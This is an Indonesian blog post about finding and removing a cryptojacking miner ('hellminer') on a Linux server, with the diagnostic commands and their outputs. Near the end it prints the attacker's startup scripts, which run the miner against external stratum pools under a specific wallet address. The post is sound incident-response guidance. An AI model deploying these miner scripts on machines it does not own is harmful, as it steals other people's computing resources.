CPU 100% ternyata dipakai miner orang

Bismilaahirrohmaanirrohiim…

jika server anda dipakai orang untuk mining, maka cpu usage akan habis dipakai dia, akibatnya, server jadi sangat lemot.

untuk cek bisa pakai perintah

htop

untuk melihat yang paling banyak makan cpu

ps aux --sort=-%cpu | head -20
root     365968 96.0  0.0  92196  2040 ?        Rl   Aug29 7966:36 verus-solver                                                                                                              --cpu 0
root     365967 95.9  0.0  92196  2056 ?        Rl   Aug29 7965:16 verus-solver                                                                                                              --cpu 3
root     365969 95.9  0.0  92196  2068 ?        Rl   Aug29 7965:16 verus-solver                                                                                                              --cpu 2
root     365970 95.9  0.0  92196  1992 ?        Rl   Aug29 7965:15 verus-solver                                                                                                              --cpu 1
mysql      1093 10.8  5.1 2827872 405732 ?      Ssl  Aug13 3409:05 /usr/libexec/                                                                                                             mysqld --basedir=/usr
root        676  0.9  0.0      0     0 ?        S<   Aug13 308:15 [loop0]
root     934181  0.3  0.0 264564  6088 pts/0    S+   00:47   0:00 htop
root     933514  0.2  0.0      0     0 ?        I    00:33   0:02 [kworker/u8:0-                                                                                                             events_unbound]
root         10  0.1  0.0      0     0 ?        S    Aug13  50:41 [ksoftirqd/0]

nama nya diketahui “verus-solver” walaupun itu bukan nama servisnya.

Baca Juga:   Reset password cyberpanel via SSH

Cek servis yang jalan, cari yang mencurigakan, khususnya di startup

systemctl list-unit-files --type=service | grep enabled

[root@ns1 ~]# systemctl list-unit-files --type=service | grep enabled
auditd.service                                enabled
autovt@.service                               enabled
chronyd.service                               enabled
cloud-config.service                          enabled
cloud-final.service                           enabled
cloud-init-local.service                      enabled
cloud-init.service                            enabled
cpecs.service                                 enabled
crond.service                                 enabled
dbus-org.fedoraproject.FirewallD1.service     enabled
dbus-org.freedesktop.nm-dispatcher.service    enabled
dbus-org.freedesktop.timedate1.service        enabled
dovecot.service                               enabled
firewalld.service                             enabled
getty@.service                                enabled
hellminer.service                             enabled
import-state.service                          enabled
irqbalance.service                            enabled
kdump.service                                 enabled
loadmodules.service                           enabled
lscpd.service                                 enabled
lshttpd.service                               enabled
lsws.service                                  enabled
mariadb.service                               enabled
mysql.service                                 enabled
mysqld.service                                enabled
NetworkManager-dispatcher.service             enabled
NetworkManager-wait-online.service            enabled
NetworkManager.service                        enabled
nis-domainname.service                        enabled
opendkim.service                              enabled
openlitespeed.service                         enabled
pdns.service                                  enabled
postfix.service                               enabled
pure-ftpd.service                             enabled
qemu-guest-agent.service                      enabled
rc-local.service                              enabled-runtime
redis.service                                 enabled
rsyslog.service                               enabled
selinux-autorelabel-mark.service              enabled
sshd.service                                  enabled
sssd.service                                  enabled
syslog.service                                enabled
sysstat.service                               enabled
systemd-fsck-root.service                     enabled-runtime
timedatex.service                             enabled
tuned.service                                 enabled


disini akan banyak list, nah ketemu namanya: hellminer.service

Cek netstat

netstat -tnp | grep ESTABLISHED

tcp        0      0 172.104.164.36:22       113.11.181.209:41833    ESTABLISHED 934383/sshd: root [
tcp        0      0 172.104.164.36:40868    139.99.16.105:5040      ESTABLISHED 766320/hellminer
tcp        0      0 172.104.164.36:22       113.11.181.209:40421    ESTABLISHED 934272/sshd: root [
tcp        0    544 172.104.164.36:22       113.11.181.209:38827    ESTABLISHED 934116/sshd: root [
tcp        3      0 172.104.164.36:465      206.168.34.45:33774     ESTABLISHED -
tcp        0      0 172.104.164.36:51664    193.219.97.14:443       ESTABLISHED 6494/[kswapd0]
tcp        0     51 172.104.164.36:443      98.83.177.42:56678      ESTABLISHED 459613/openlitespee
tcp        0      0 172.104.164.36:22       113.11.181.209:28737    ESTABLISHED 933174/sshd: root 

Miner biasanya connect ke pool di luar negeri (port 3333, 4444, 5555). Setelah ketemu, jangan cuma kill prosesnya → hapus binary/script + matikan cron/systemd service yang memanggilnya.
Kalau banyak sekali hasil mencurigakan → berarti sistem sudah dikuasai penuh, saran terbaik tetap reinstall OS bersih setelah backup data aman.

Baca Juga:   Mengatasi Cyberpanel error Session reuse detected, IPAddress logged dan auto logout

Penanganan

cek dulu servisnya

systemctl status hellminer.service

hellminer.service - Hellminer Service
   Loaded: loaded (/etc/systemd/system/hellminer.service; enabled; vendor preset: disabled)
   Active: active (running) since Sat 2025-08-23 08:29:33 UTC; 1 weeks 4 days ago
 Main PID: 766318 (start-hellminer)
    Tasks: 12 (limit: 49498)
   Memory: 30.9M
   CGroup: /system.slice/hellminer.service
           ├─365967 verus-solver --cpu 3
           ├─365968 verus-solver --cpu 0
           ├─365969 verus-solver --cpu 2
           ├─365970 verus-solver --cpu 1
           ├─766318 /bin/bash /home/tings/miner/start-hellminer.sh
           ├─766319 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4
           └─766320 /home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38728 [10 ms]
Sep 04 01:00:49 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38729 [11 ms]
Sep 04 01:00:54 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38730 [10 ms]
Sep 04 01:01:10 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38731 [10 ms]
Sep 04 01:01:28 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38732 [2 ms]
Sep 04 01:01:32 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38733 [10 ms]
Sep 04 01:01:34 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38734 [11 ms]
Sep 04 01:01:37 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38735 [11 ms]
Sep 04 01:02:14 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38736 [10 ms]
Sep 04 01:02:17 ns1.domain.com start-hellminer.sh[766318]: Pool 01: accepted share #38737 [9 ms]

udah ketahuan dia dimana, tinggal eksekusi

systemctl stop hellminer.service

menonaktifkan service autostart / startup

systemctl disable hellminer.service

Kalau ingin benar-benar hilang (hapus file servicenya):
rm -f /etc/systemd/system/hellminer.service
systemctl daemon-reload

Selesai.

Baca Juga:   Solved: error setup DNS zones saat recheck configuration

Berikut ini contoh isi file startup dari kode minernya

file miner:
ada di /root/miner/
start-hellminer.sh
#!/bin/bash
cd /root/miner
export TMPDIR=/root/miner/tmpdir

# Jalankan hellminer dengan threads maksimum
/root/miner/hellminer -c stratum+tcp://na.luckpool.net:3956 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

/home/tings/miner/start-hellminer.sh
#!/bin/bash
cd /home/tings/miner
export TMPDIR=/home/tings/miner/tmpdir

# Jalankan hellminer dengan threads maksimum
/home/tings/miner/hellminer -c stratum+tcp://sg.vipor.net:5040 -u REAAEf2hQyMfT8Q4kvBCnNsxE9sRmppL1k.BAJAKAN01 -p x --cpu 4

Demikian, semoga bermanfaat

Bagikan

You May Also Like

About the Author: rasupe

Discover more from Rasupe

Subscribe now to keep reading and get access to the full archive.

Continue reading